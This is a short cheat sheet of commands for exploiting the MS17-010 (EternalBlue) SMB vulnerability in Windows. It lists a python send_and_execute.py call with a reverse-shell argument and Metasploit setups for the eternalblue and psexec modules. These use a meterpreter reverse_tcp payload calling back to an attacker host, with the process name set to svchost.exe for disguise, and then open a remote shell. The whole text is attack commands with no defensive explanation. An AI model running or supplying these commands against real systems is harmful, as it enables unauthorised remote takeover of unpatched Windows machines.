# python send_and_execute.py <target-ip> reverseshell
python2 send_and_execute.py ms17-010.exe
💥 important note : Executed in root shell
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set processname svchost.exe
set RHOSTS <Target_IP>
set LHOST <Attacker_IP>
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <Attacker_IP>
meterpreter > shell
Exploit demonstration : https://www.youtube.com/watch?v=RW5l6dQ8H-8